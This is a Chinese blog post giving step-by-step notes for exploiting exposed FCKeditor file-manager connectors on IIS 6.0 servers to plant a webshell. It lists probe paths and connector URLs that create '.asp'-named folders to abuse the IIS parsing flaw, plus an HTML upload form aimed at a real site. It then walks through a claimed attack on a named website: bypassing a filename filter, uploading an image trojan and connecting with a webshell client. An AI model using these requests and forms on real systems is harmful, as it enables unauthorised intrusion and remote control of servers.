最新消息:
    你的位置:jinglingshu的博客 > 渗透 > FCKeditor利用注意事项

    FCKeditor利用注意事项

    渗透 admin 3108浏览 0评论

    遇到FCKeditor首先,你得确定下Fckeditor的版本。

    /FCKeditor/editor/dialog/fck_about.html

    其次,你确定下以下几个上传页面是否真的被删除了呢?

    /FCKeditor/editor/filemanager/browser/default/browser.html
    /FCKeditor/editor/filemanager/browser/default/connectors/test.html
    /FCKeditor/editor/filemanager/upload/test.html
    /FCKeditor/editor/filemanager/connectors/test.html
    /FCKeditor/editor/filemanager/connectors/uploadtest.html

    嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么

    /fckeditor/editor/filemanager/connectors/aspx/connector.aspx
    /fckeditor/editor/filemanager/connectors/asp/connector.asp
    /fckeditor/editor/filemanager/connectors/php/connector.php

    如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例1.查看Media目录下的文件:

    /fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F

    红色Media可以更改为File或者image,相应的进入文件或者图片目录下

    2.利用iis解析漏洞创建1.asp特殊目录

    fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp

    红色的是对应的Media目录,蓝色的是特殊目录名字

    3.构建表单,上传webshell到特殊目录

    <form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp” method=”post”>
    Upload a new file:<br>
    <input type=”file” name=”NewFile” size=”50″><br>
    <input id=”btnUpload” type=”submit” value=”Upload”>
    </form>

    将以上代表保存为HTML格式,http://www.91ri.org修改成你入侵的网站地址,Type=Media是对应的Media目录,1.asp为特殊目录名。

    —————————————————————————————————————————————————————
    ps:下面讲解一下Fckeditor获取webshell遇到的问题:网站http://qusibani.alr.bjasdhk.com
    1、测试上传页面是否存在。根据上面提到的几个页面去测试,发现只有/FCKeditor/editor/filemanager/browser/default/browser.html页面存在,但是访问时返回结果如下:
    20130627213748
    平常我遇到这样的情形都以为fckeditor无法利用而放弃。今天看到师兄利用获取webshell后,才知道可以利用。
    原来访问时返回上面错误的原因是访问页面时没有带参数
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/aspx/connector.aspx
    ps:(1)参数中的Connector要根据实际情况来填写,即测试下面三个,哪个存在就用哪个。
    /fckeditor/editor/filemanager/connectors/aspx/connector.aspx
    /fckeditor/editor/filemanager/connectors/asp/connector.asp
    /fckeditor/editor/filemanager/connectors/php/connector.php
    (2)参数中的Type参数也是根据实际情况选的,一般File、Media等都可以,参数不同浏览的文件夹就不同。
    2、创建.asp文件夹。
    根据上一步成功访问browser.html页面:
    http://qusibani.alr.bjasdhk.com/FCKeditor/editor/filemanager/browser/default/browser.html?browser.html?Type=File&Connector=../../connectors/aspx/connector.aspx
    在该页面上可以创建文件夹,由于网站是IIS6.0的想创建.asp目录来获取webshell。但是创建目录时网站会将.变为_。
    20130627214741
    若是平常的话我现在就没有办法了,但有师兄在,还是可以建.asp目录的。
    创建的方法是参考http://chengkers.lofter.com/post/14c64b_3797e8,即访问页面
    FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
    ps:上面url中的参数Type的含义和1中Type的含义一样,可选Image、File等,选的不同访问的文件夹就不同。当然connectors/asp/connector.asp也是根据1中测试来选的,其他就可以不变了。
    根据实际情况访问http://qusibani.alr.bjasdhk.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2Fshell5.asp&NewFolderName=z&uuid=1244789975684
    20130627215827

    访问后要查看结果还得访问1中的那个url。结果如下:
    20130627220449
    可以看到已经成功创建,现在只要上传图片木马即可获取webshell了。
    20130627221206
    查看上传图片元素,找到图片地址:http://qusibani.alr.bjasdhk.com/UploadFile/file/shell5.asp/2013/06/27/22-10-35_6093.jpg
    20130627221306
    20130627221424
    菜刀连接
    20130627221545

    转载请注明:jinglingshu的博客 » FCKeditor利用注意事项

    与本文相关的文章

    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址